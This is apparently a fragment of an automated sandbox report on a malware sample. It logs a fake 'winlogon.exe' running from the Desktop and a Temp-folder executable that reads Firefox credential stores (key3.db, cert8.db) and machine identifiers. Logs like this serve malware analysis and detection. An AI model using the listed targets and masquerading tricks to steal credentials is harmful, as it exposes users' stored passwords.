Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wbengine.exe | File created: C:\System Volume Information\WindowsImageBackup |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D634B0 wsprintfW,CreateNamedPipeW,CreateEventW,CloseHandle,ConnectNamedPipe,GetLastError,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,GetOverlappedResult,CancelIo,CloseHandle,ReadFile,CloseHandle, | 1_2_00D634B0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100879B6 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, | 2_2_100879B6 |
Source: C:\Users\user\Desktop\winlogon.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Queries volume information: C:\ VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db VolumeInformation |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db VolumeInformation |
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation |